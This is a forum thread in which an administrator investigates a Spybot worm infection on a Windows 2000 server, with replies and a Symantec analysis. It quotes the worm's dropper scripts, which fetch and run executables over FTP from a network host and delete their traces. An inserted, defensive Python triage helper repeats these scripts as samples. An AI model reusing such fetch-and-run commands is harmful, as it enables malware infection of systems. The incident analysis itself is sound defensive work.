micro32.exe


John Coutts

Just discovered a virus that I am having a little difficulty in identifying.

On a 2000 server that I maintain remotely, I logged in to do some system
maintenance yesterday. When I logged out, the system shut down. Today, we
brought the system back up, and I could connect remotely via pcAnywhere, but I
could not log in. Every UserID and password I tried would not work. Finally in
frustration, I tried a blank password to the administrator account. All the SAM
database has been wiped out. After rebuilding all the security settings, I then
started to look for the culprit. It appears the virus was activated when I
logged into the server, as there is an application log entry saying that the
system could not update my user settings when I logged out.

What I found was <micro32.exe> in the WINNT\SYSTEM32 directory as a
System/Hidden/ReadOnly file. It does not get identified when scanned by NAV,
and I have not been able to find any information on it. It seems somewhat
similar to WORM_RBOT.KI identified by TREND Micro, in that it was stored in the
registry under the name Microsoft Micro Protection Subsystems (similar to
Microsoft Protection Subsystems), but that is where the similarity ends. The
file name and size are both different.

Can anyone shed some light?

J.A. Coutts
 

Send it to NAV for investigation.
 
On that special day, John Coutts, ([email protected])
said...


Hmm, SAM database? Does that mean there is something installed on the
computer that is based on the MDAC service? That may have been the way
this thing got in.

http://www.microsoft.com/security/bulletins/200211_windows.mspx


Gabriele Neukam

(e-mail address removed)
************** REPLY SEPARATER ****************
FYI: The SAM database is the encrypted database that NT/2000/XP uses to store
the UserID/Password information. It has nothing to do with database access.
 
On that special day, John Coutts, ([email protected])
said...
FYI: The SAM database is the encrypted database that NT/2000/XP uses to store
the UserID/Password information. It has nothing to do with database access.

Ok, then I was wrong. Sorry for the misconception.


Gabriele Neukam

(e-mail address removed)
 
Just discovered a virus that I am having a little difficulty in identifying.

J.A. Coutts
******************** SEPARATER ***********************
Heard back from Symantec this morning. They say that this virus belongs to the
W32.Spybot.Worm family and is unrepairable (full text below). Now the question
is how did this worm get on this machine. Spybot is supposed to be spread via
KaZaA and mIRC. This is a W2K server operating behind a firewall. The only port
accessible to the outside world is port 80 and the pcAnywhere ports. It is also
the only NT style machine on this network (the rest are ME), and none of the
rest seem to be infected. I found some interesting scripts (dated the day
before the crash) in the system directory that may provide a clue.

** .pif **
open 192.168.1.13 18600
user a a
binary
GET crss.exe
bye

** c.bat **
@echo off
ftp -n -v -s:.pif
crss.exe
del .pif
del /F c.bat
exit /y

** o **
open 192.168.1.13 22327
user 1 1
get bling.exe
quit

** crss.exe **
--zero length--

IP 192.168.1.13 does not exist on this network. It is however the next
available DHCP served address. It is beginning to look like someone physically
connected to this network in order to accomplish this deed (and no it is not a
wireless network). It is quite possible that the crash simply occurred because
of a poorly behaving worm.

J.A. Coutts
--------------------------------------------------------------------
Dear (e-mail address removed),

We have analyzed your submission. The following is a report of our
findings for each file you have submitted:

filename: C:\Temp\scan\micro32.exe
machine: ERNIE
result: This file is infected with W32.Spybot.Worm

Developer notes:
C:\Temp\scan\micro32.exe is non-repairable threat. NAV with the latest
rapidrelease definition detects this. Please delete this file and replace it
if necessary. Please follow the instruction at the end of this email message
to install the latest rapidrelease definitions.

Symantec Security Response has determined that the sample(s) that you provided
are infected with a virus, worm, or Trojan. We have created RapidRelease
definitions that will detect this threat. Please follow the instruction at the
end of this email message to download and install the latest RapidRelease
definitions.
Symantec is now building a new set of definitions to include the threat you
have submitted. The approximate time to complete this process is one hour. We
recommend checking the ftp site periodically over the next 60 to 90 minutes to
download these definitions as soon as they are available.
-----------------------------------------------------------------
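The three files found in the system directory are a classic fetch-and-run dropper: an FTP command script (open HOST PORT / user / get / bye), a batch wrapper that feeds it to "ftp -n -v -s:" and then launches whatever was downloaded, and a second script pointing at another port on the same host. The triage helper below is an added example, written for this thread and not taken from the post or from any vendor tool. It parses scripts of that shape and flags the indicators a responder would look for. The sample file contents are constructed to mirror the ".pif", "c.bat" and "o" files quoted above; the scoring heuristics (non-standard FTP port, throwaway one-character credentials, executable download, fetch-then-run in a batch file) are my own assumptions, not a published signature.

```python
"""Triage helper for FTP dropper scripts of the kind found on the server.

Added example, not part of the thread. Parses bot-style FTP command scripts
(open HOST PORT / user U P / binary / get FILE / bye) and the batch wrapper
that runs them with "ftp -n -v -s:<script>", and reports dropper indicators.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed samples modelled on the ".pif", "c.bat" and "o" files in the post.
SAMPLE_PIF = "open 192.168.1.13 18600\nuser a a\nbinary\nGET crss.exe\nbye\n"
SAMPLE_O = "open 192.168.1.13 22327\nuser 1 1\nget bling.exe\nquit\n"
SAMPLE_BAT = "@echo off\nftp -n -v -s:.pif\ncrss.exe\ndel .pif\ndel /F c.bat\nexit /y\n"
# Constructed benign script (an upload to a backup host) for contrast.
SAMPLE_BENIGN = "open ftp.example.invalid\nuser backup\nbinary\nput nightly.zip\nbye\n"

EXEC_EXT = (".exe", ".pif", ".scr", ".com", ".bat", ".cmd")
# "ftp -s:<file>" (with or without .exe) anywhere on a line of a batch file.
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b[^\n]*?-s:(\S+)", re.IGNORECASE)


@dataclass
class FtpDropper:
    """What an FTP command script would connect to and fetch."""
    host: Optional[str] = None
    port: int = 21          # ftp.exe default when "open" carries no port
    user: Optional[str] = None
    password: Optional[str] = None
    downloads: List[str] = field(default_factory=list)


def parse_ftp_script(text: str) -> FtpDropper:
    """Extract host, port, credentials and fetched file names from an FTP script."""
    d = FtpDropper()
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts:
            continue
        cmd = parts[0].lower()          # ftp.exe commands are case-insensitive
        if cmd == "open" and len(parts) >= 2:
            d.host = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                d.port = int(parts[2])
        elif cmd == "user" and len(parts) >= 2:
            d.user = parts[1]
            d.password = parts[2] if len(parts) >= 3 else None
        elif cmd in ("get", "mget") and len(parts) >= 2:
            d.downloads.extend(parts[1:])
    return d


def dropper_indicators(text: str) -> List[str]:
    """Heuristic reasons (assumed, not a vendor signature) an FTP script looks like a dropper."""
    d = parse_ftp_script(text)
    reasons: List[str] = []
    if d.host is None:                  # not an FTP command script at all
        return reasons
    if d.port != 21:
        reasons.append(f"non-standard FTP port {d.port} on {d.host}")
    if d.user is not None and len(d.user) <= 2 and (d.password is None or len(d.password) <= 2):
        reasons.append(f"throwaway credentials {d.user}/{d.password}")
    exes = [f for f in d.downloads if f.lower().endswith(EXEC_EXT)]
    if exes:
        reasons.append("downloads executable(s): " + ", ".join(exes))
    return reasons


def batch_indicators(text: str) -> Dict[str, List[str]]:
    """FTP scripts a batch file feeds to "ftp -s:" and executables it launches by bare name."""
    scripts = FTP_SCRIPT_RE.findall(text)
    launched = []
    for line in text.splitlines():
        tok = line.strip().split()
        if tok and tok[0].lower().endswith(EXEC_EXT):
            launched.append(tok[0])
    return {"scripts": scripts, "launched": launched}


def triage(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map file name -> reasons for every file that shows dropper behaviour."""
    flagged: Dict[str, List[str]] = {}
    for name, text in files.items():
        reasons = dropper_indicators(text)
        b = batch_indicators(text)
        if b["scripts"]:
            reasons.append("runs ftp with -s: script " + ", ".join(b["scripts"]))
            if b["launched"]:
                reasons.append("launches " + ", ".join(b["launched"]) + " after the fetch")
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    found = {".pif": SAMPLE_PIF, "c.bat": SAMPLE_BAT, "o": SAMPLE_O, "backup.txt": SAMPLE_BENIGN}
    for name, reasons in triage(found).items():
        print(name)
        for r in reasons:
            print("   -", r)
```

On a real box the dictionary passed to triage() would be built by reading small text files from the system directory; the host and port it extracts are the first thing to check against DHCP leases and firewall logs, which is exactly how the poster spotted that 192.168.1.13 was the next unassigned lease.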
 
(e-mail address removed) (John Coutts) wrote in
Spybot is supposed to be spread via
KaZaA and mIRC

I don't think it's spread via those, but it does try to make contact with an
IRC chatroom for commands... at least the version I got did. Afterwards
someone on the outside accessed me via tftp.exe until I got suspicious and
blocked it off (I was doing Windows Update at the time and thought the
firewall warnings I was getting were part of it). I never heard of tftp
before but it is an MS program. It's no longer permitted access anywhere,
even on private IPs... nothing seems to miss it.

As for Norton, it didn't catch the trojan. I found, renamed, and moved it
then and sent it to them, like you did. They identified it as the same
thing and sent me the same emails, and NAV still didn't identify it a week
and 3 updates later. Bit Defender did. Go figure.
 
From the Symantec write up on
http://securityresponse.symantec.com/avcenter/venc/data/w32.spybot.worm.html

|Newer variants may also spread by exploiting the following vulnerabilities:
<snip>
|The WebDav Vulnerability (described in Microsoft Security Bulletin MS03-007) using TCP port 80.

From M$'s bulletin at
http://www.microsoft.com/technet/security/bulletin/MS03-007.mspx

|Impact of vulnerability:
|Run code of attacker's choice
|Maximum Severity Rating:
|Critical
|Recommendation:
|Systems administrators should apply the patch immediately

They have a link to the patch
http://www.microsoft.com/downloads/...45-5145-4844-B62E-C69D32AC929B&displaylang=en

Regards, Dave Hodgins
 
******************* REPLY SWEPARATER ********************
Downloaded and installed the latest update (09/11/2004). It now detects as
W32.Spybot.Worm. Unfortunately, the description on this virus is very generic,
and really doesn't help me very much. Even with all the vulnerabilities
in Windows 2000 (I admit this server was not fully patched), the only way into
this server was through port 80 or on the local network. The evidence points to
the local network.

J.A. Coutts
 
(e-mail address removed) (John Coutts) wrote in
Downloaded and installed the latest update (09/11/2004). It now
detects as W32.Spybot.Worm. Unfortunately, the description on this
virus is very generic, and really doesn't help me very much.
Even with all the vulnerabilities in Windows 2000 (I admit this server
was not fully patched), the only way into this server was through port
80 or on the local network. The evidence points to the local network.

J.A. Coutts

I guess it does spread through KaZaA. I don't use it myself. But you could
be right and someone inside downloaded a crack or other small program and
ran it.

Do you run shieldsup to be sure no other port is open?

This was on the symantec page?
http://securityresponse.symantec.com/avcenter/venc/data/w32.spybot.worm.html

The WebDav Vulnerability (described in Microsoft Security Bulletin MS03-
007) using TCP port 80.

So maybe it was that.
 
SWEPERATOR?? That's new!



 
****************** SEPARATER ******************
Mystery solved. It just so happens that a Western Union representative was in
that particular day (Sep. 7) and connected to the network with a Notebook
computer. It was likely the DDCOM vulnerability that allowed the virus to be
loaded on the server.

J.A. Coutts
 
(e-mail address removed) (John Coutts) wrote in
Mystery solved. It just so happens that a Western Union representative
was in that particular day (Sep. 7) and connected to the network with
a Notebook computer. It was likely the DDCOM vulnerability that
allowed the virus to be loaded on the server.

It's Microsoft's fault :P
 
On that special day, John Coutts, ([email protected])
said...
It just so happens that a Western Union representative was in
that particular day (Sep. 7) and connected to the network with a Notebook
computer.

Sue him. And patch your server.


Gabriele Neukam

(e-mail address removed)
 